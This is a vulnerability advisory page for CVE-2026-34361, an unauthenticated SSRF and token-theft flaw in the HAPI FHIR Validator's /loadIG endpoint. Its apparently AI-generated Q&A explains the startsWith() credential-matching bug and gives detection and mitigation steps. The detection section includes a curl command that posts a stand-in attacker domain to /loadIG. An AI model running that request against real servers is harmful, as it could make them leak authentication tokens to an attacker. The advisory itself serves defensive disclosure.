CVE-2026-34361
Unauthenticated SSRF and Token Theft in HAPI FHIR Validator
Publication date: 2026-03-31
Last updated on: 2026-04-03
Assigner: GitHub, Inc.
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| hapifhir | hl7_fhir_core | to 6.9.4 (exc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-552 | The product makes files or directories accessible to unauthorized actors, even though they should not be. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-34361 is a critical unauthenticated Server-Side Request Forgery (SSRF) vulnerability in the HAPI FHIR Validator HTTP service, specifically via the /loadIG endpoint in versions prior to 6.9.4.
The /loadIG endpoint accepts unauthenticated POST requests containing a JSON body with an "ig" field. If this field contains an HTTP(S) URL, the service makes an outbound GET request to that URL.
A flaw in the credential provider uses a startsWith() string comparison to decide if authentication credentials (Bearer tokens, Basic auth, API keys) should be attached to outbound requests. This allows an attacker to register a domain that prefix-matches a legitimate configured server URL and steal authentication tokens intended for that legitimate server.
Additionally, the HTTP client follows redirects without properly disabling credential re-evaluation, enabling redirect amplification attacks where credentials can be leaked through indirect redirect chains.
This vulnerability enables attackers to steal sensitive authentication credentials and potentially publish malicious FHIR packages or cause data breaches.
How can this vulnerability impact me? :
This vulnerability can lead to theft of sensitive authentication tokens such as Bearer tokens, Basic authentication credentials, and API keys configured for legitimate FHIR servers.
Attackers can use stolen credentials to perform supply chain attacks by publishing malicious FHIR packages, potentially compromising downstream systems.
It can also result in data breaches exposing protected clinical data, impacting confidentiality.
The vulnerability has a high severity with a CVSS score of 9.3, indicating critical impact with no required privileges or user interaction.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by monitoring for unauthenticated POST requests to the /loadIG endpoint of the FHIR Validator HTTP service, especially those containing JSON bodies with an "ig" field set to HTTP(S) URLs.
Network detection can focus on outbound HTTP GET requests initiated by the service to attacker-controlled or unexpected domains that prefix-match legitimate configured server URLs.
Suggested commands include using network monitoring tools or packet capture utilities to filter for POST requests to /loadIG and outbound HTTP requests from the service.
- Using curl to test the endpoint: curl -X POST http://<FHIR-validator-host>/loadIG -H "Content-Type: application/json" -d '{"ig":"http://attacker-controlled-domain.com"}'
- Using tcpdump or Wireshark to capture outbound HTTP requests from the FHIR Validator server to suspicious domains.
- Checking server logs for unauthenticated POST requests to /loadIG with unusual or external URLs in the "ig" field.
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include upgrading the HAPI FHIR Validator component to version 6.9.4 or later, where the vulnerability has been patched.
If upgrading is not immediately possible, restrict access to the /loadIG endpoint to trusted users or networks to prevent unauthenticated requests.
Implement network-level controls such as firewall rules or proxy allowlisting to restrict outbound HTTP requests from the FHIR Validator service to only trusted hosts (e.g., packages.fhir.org, packages2.fhir.org, build.fhir.org).
Review and update the credential provider logic to avoid using startsWith() prefix matching for URL credential attachment, ensuring strict URL origin matching.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
This vulnerability allows attackers to steal authentication tokens (Bearer, Basic, API keys) configured for legitimate FHIR servers, which can lead to unauthorized access to protected clinical data.
The theft of sensitive authentication credentials and potential exposure of protected clinical data can result in violations of data protection regulations such as GDPR and HIPAA, which mandate strict controls over personal and health information.
By enabling supply chain attacks and unauthorized data access, this vulnerability undermines the confidentiality and security requirements essential for compliance with these standards.